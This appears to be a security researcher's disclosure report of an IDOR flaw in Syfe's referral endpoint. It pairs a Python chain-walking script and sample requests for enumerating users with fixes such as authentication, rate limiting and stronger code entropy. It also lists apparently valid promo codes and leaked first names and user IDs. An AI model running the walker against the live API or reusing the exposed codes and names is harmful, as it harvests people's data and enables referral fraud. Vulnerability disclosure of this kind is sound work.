🫐Syfe

Bro, I don't give a damn whether it's informative, it's still growth for me, you know.

Summary:

An Insecure Direct Object Reference (IDOR) vulnerability was discovered in Syfe’s promo code system: the referral lookup endpoint returns details for any valid referral code without authentication, exposing the names of the users who own those codes. This flaw could be exploited to fraudulently redeem promo codes, leading to financial losses and reputational damage. Additionally, a deeper issue was identified in the referral system: iterating over the referrerAppliedCode field exposes the hierarchical structure of users, potentially leading to mass user data exposure.

Technical Details:

  1. The invite system uses API endpoints like:

GET /promo/referral/SRPTUW33H HTTP/2
Host: api.syfe.com
  • The server responds with a 200 OK, revealing valid promo code details.

  • For this code the referrerAppliedCode field is null, meaning its owner did not sign up with someone else’s code (the root of a referral chain; see the categorization below). The code itself is valid, so it could be exploited.

Burp Repeater - Syfe API (screenshot):

Syfe API in the browser (screenshot):

  2. The promo codes are also accessible via:

https://www.syfe.com/invite?PROMO=SRPTUW33H
  • This page exposes the referrer’s first name (e.g., Sze Wei) to anyone holding the code, a privacy violation.

  3. Categorization of Promo Codes Based on Referral Status:

  • Codes Without a Referrer (referrerAppliedCode: NULL):

    • SRP16LW72, SRPQ9XPUD, SRPS4H3NH, SRPVW9182, SRPRRBGSF, SRPRYKNMN, SRPSURFGP, SRPSSMRCG, SRPSSMNGY, SRPSXQDTY, SRPT2KZFA, SRP6X8B8Y, SRPTEBYFA, SRPTGPUD2, SRPTNFL5D, SRPTUW33H, sgsmi, NOMONEYLAH

  • Codes with an Existing Referrer (referrerAppliedCode: <code>):

    • SRP6G4YN8, SRPRDR9KS, SRPS4P5YC, SRPSL8MGX, SRPT54W4C, SRPTXDRBM, SRPSTTW7Y, SRPTJDXHM, SRPTH8LK3

  4. Mapping User Referral Hierarchy:

  • By leveraging the referrerAppliedCode value in a request, it is possible to retrieve another user’s referrerId and firstName.

  • By following the referrerAppliedCode chain, it is possible to reconstruct a tree-like structure of referrals.

Example of exploitation:

  1. Requesting /promo/referral/SRPTXDRBM returns:

{ "firstName": "Heng", "referrerId": 592559147, "referrerAppliedCode": "SRPSTTW7Y" }
  2. Using SRPSTTW7Y in a new request reveals another user:

{ "firstName": "VICTOR", "referrerId": 555275190, "referrerAppliedCode": "SRP6X8B8Y" }
    • Continuing this process (with the other promo codes that I’ve found) reveals a full referral tree, potentially exposing thousands of user identities.

  3. Entropy analysis of the referral codes shows a predictable structure: a fixed SRP prefix followed by six upper-case alphanumeric characters. Only the six variable characters contribute to the search space, which makes enumeration feasible.

  4. Attempting to redeem a retrieved promo code results in: "Promo code is currently under review. You will receive the benefits if you meet all the terms and conditions of the promos."

    • This suggests attackers could create fake accounts to exploit promotional bonuses.
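The chain walk described above, as an added example that is not part of the original report: it follows referrerAppliedCode from a seed code toward the root and inverts the edges into a referrer -> invitees tree. It runs offline against a constructed in-memory stand-in for GET /promo/referral/<code>; the two middle records reproduce the responses quoted above, while the root record for SRP6X8B8Y (name and id) is an assumption. To use it against a live endpoint you are authorized to test, replace fake_fetch with a function that performs the HTTP GET and returns the parsed JSON.

```python
"""Referral-chain walker (added example, not the report's own tooling)."""
from typing import Callable, Dict, List, Optional

# Constructed stand-in for the API. The first two records are the responses
# quoted in the report; the root record is assumed (the report only lists
# SRP6X8B8Y as a code whose referrerAppliedCode is null).
FAKE_API: Dict[str, dict] = {
    "SRPTXDRBM": {"firstName": "Heng", "referrerId": 592559147, "referrerAppliedCode": "SRPSTTW7Y"},
    "SRPSTTW7Y": {"firstName": "VICTOR", "referrerId": 555275190, "referrerAppliedCode": "SRP6X8B8Y"},
    "SRP6X8B8Y": {"firstName": "Root", "referrerId": 1, "referrerAppliedCode": None},  # assumed
}


def fake_fetch(code: str) -> Optional[dict]:
    """Stand-in for requests.get(f"https://api.syfe.com/promo/referral/{code}").json().
    Returns None where the real endpoint would return a non-200."""
    return FAKE_API.get(code)


def walk_chain(fetch: Callable[[str], Optional[dict]], start: str,
               max_hops: int = 50) -> List[dict]:
    """Follow referrerAppliedCode from `start` toward the root.

    Returns the records visited, in order, each tagged with its own code.
    Stops on a null referrerAppliedCode, an unknown code, a cycle, or
    max_hops, so a malformed or malicious chain cannot loop forever."""
    chain: List[dict] = []
    seen = set()
    code: Optional[str] = start
    while code and code not in seen and len(chain) < max_hops:
        seen.add(code)
        rec = fetch(code)
        if rec is None:
            break
        chain.append({"code": code, **rec})
        code = rec.get("referrerAppliedCode")
    return chain


def build_tree(fetch: Callable[[str], Optional[dict]],
               seeds: List[str]) -> Dict[str, List[str]]:
    """Walk every seed and invert the edges: referrer code -> [invitee codes].
    Seeds that share ancestors merge into one tree."""
    children: Dict[str, List[str]] = {}
    for seed in seeds:
        for rec in walk_chain(fetch, seed):
            parent = rec["referrerAppliedCode"]
            if parent and rec["code"] not in children.setdefault(parent, []):
                children[parent].append(rec["code"])
    return children


if __name__ == "__main__":
    for rec in walk_chain(fake_fetch, "SRPTXDRBM"):
        print(rec["code"], rec["firstName"], rec["referrerId"], "->", rec["referrerAppliedCode"])
    print(build_tree(fake_fetch, ["SRPTXDRBM"]))
```

Each hop costs one unauthenticated request, so the number of users exposed is bounded only by the number of seed codes an attacker can collect and the absence of rate limiting on the endpoint.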

Steps To Reproduce:

For this case I will leave you a very quick video as a proof of concept explaining the step by step from Burp, and here is the easy step by step:

  1. Open https://api.syfe.com/promo/referral/<code>, replacing <code> with any of the promo codes listed in section 3 (Categorization of Promo Codes Based on Referral Status).

  2. Open the Syfe main website: https://www.syfe.com/invite?PROMO=<code>

  3. That’s all.


Impact

  1. Financial Fraud: Attackers can mass-harvest promo codes, create fake accounts, and exploit referral rewards, causing significant financial losses.

  2. User Data Exposure: Real names and referral relationships are publicly accessible, leading to privacy breaches and phishing risks.

  3. Reputation Damage: Public exposure of user names and referral data erodes user trust, potentially harming the company’s credibility and compliance standing.

  4. Hierarchical Exposure: Attackers can map user referral chains, enabling targeted scams that abuse the trust between referrer and invitee.

Recommendation:

  • Remove referrerId and referrerAppliedCode from public responses, and stop returning the referrer’s first name on the unauthenticated invite page.

  • Restrict access to promo codes, requiring authentication.

  • Increase entropy in promo code generation: generate the variable part with a CSPRNG and make it long enough that enumeration stays impractical even under the rate limit (a fixed prefix such as SRP adds length but no entropy).

  • Enforce additional validation before applying promo codes.

  • Monitor exploitation attempts through logging and rate limiting.
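What the first, second, third and fifth recommendations look like server-side, as an added example that is not Syfe’s code: a vulnerable lookup next to a hardened one that requires a session, rate-limits per user and returns only code validity, plus the per-position entropy measurement behind the entropy finding and a CSPRNG-backed generator. The handler signature, the session argument and the fixed-window rate limiter are assumed shapes; the user store is constructed from the two records quoted in the report and the field names are the report’s.

```python
"""Vulnerable vs hardened referral lookup (added example, not Syfe's code)."""
import math
import secrets
import string
import time
from collections import Counter
from typing import Dict, List, Optional, Tuple

ALPHABET = string.ascii_uppercase + string.digits  # 36 symbols, as in the SRP-prefixed codes

# Constructed user store keyed by referral code, from the records quoted in the report.
USERS: Dict[str, dict] = {
    "SRPTXDRBM": {"firstName": "Heng", "referrerId": 592559147, "referrerAppliedCode": "SRPSTTW7Y"},
    "SRPSTTW7Y": {"firstName": "VICTOR", "referrerId": 555275190, "referrerAppliedCode": "SRP6X8B8Y"},
}


def lookup_vulnerable(code: str) -> Tuple[dict, int]:
    """Before: no authentication and the whole record is returned, so anyone
    holding a code learns the owner's name and id and can follow referrerAppliedCode."""
    rec = USERS.get(code)
    return (rec, 200) if rec else ({"error": "not found"}, 404)


class RateLimiter:
    """Fixed-window counter per key (assumed helper; any limiter will do)."""

    def __init__(self, limit: int, window_s: float) -> None:
        self.limit, self.window = limit, window_s
        self.hits: Dict[str, Tuple[float, int]] = {}  # key -> (window start, count)

    def allow(self, key: str, now: Optional[float] = None) -> bool:
        now = time.monotonic() if now is None else now
        start, n = self.hits.get(key, (now, 0))
        if now - start >= self.window:  # window expired: start a fresh one
            start, n = now, 0
        self.hits[key] = (start, n + 1)
        return n + 1 <= self.limit


def lookup_hardened(code: str, session_user: Optional[str], limiter: RateLimiter,
                    now: Optional[float] = None) -> Tuple[dict, int]:
    """After: a session is required, lookups are rate-limited per user, and the
    response carries only what the redeem flow needs (is the code valid).
    firstName, referrerId and referrerAppliedCode never leave the server, so
    there is no chain to walk. Valid and invalid codes share one response shape."""
    if session_user is None:
        return {"error": "authentication required"}, 401
    if not limiter.allow(session_user, now):
        return {"error": "too many requests"}, 429
    return {"valid": code in USERS}, 200


def per_position_entropy(codes: List[str]) -> List[float]:
    """Shannon entropy in bits of each character position over a sample of codes.
    A fixed prefix scores 0.0: it adds length but no search space."""
    width = min(len(c) for c in codes)
    result = []
    for i in range(width):
        counts = Counter(c[i] for c in codes)
        total = sum(counts.values())
        result.append(-sum(n / total * math.log2(n / total) for n in counts.values()))
    return result


def generate_code(prefix: str = "SRP", random_chars: int = 6) -> str:
    """CSPRNG-backed generation: secrets.choice is uniform over ALPHABET, so each
    random position carries log2(36) ~ 5.17 bits; the prefix carries none."""
    return prefix + "".join(secrets.choice(ALPHABET) for _ in range(random_chars))


if __name__ == "__main__":
    print(lookup_vulnerable("SRPTXDRBM"))
    print(lookup_hardened("SRPTXDRBM", "alice", RateLimiter(limit=5, window_s=60)))
    print(per_position_entropy(["SRPTXDRBM", "SRPSTTW7Y", "SRP6X8B8Y", "SRPTUW33H"]))
    print(generate_code())
```

Run per_position_entropy over the codes listed in section 3 and the three prefix positions come out at 0.0, which is the measurable form of the entropy finding; lengthening random_chars is what actually raises the cost of enumeration, and the rate limiter caps how fast that space can be searched per account.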

Conclusion:

This IDOR vulnerability exposes promo codes and user invite details, allowing unauthorized use and potential fraud. The ability to traverse the referral hierarchy further exacerbates the risk, exposing user relationships and identifiers. Mitigating this issue will prevent abuse and reinforce user trust in Syfe’s security framework.

Thank you,

Juan Felipe - Security Researcher
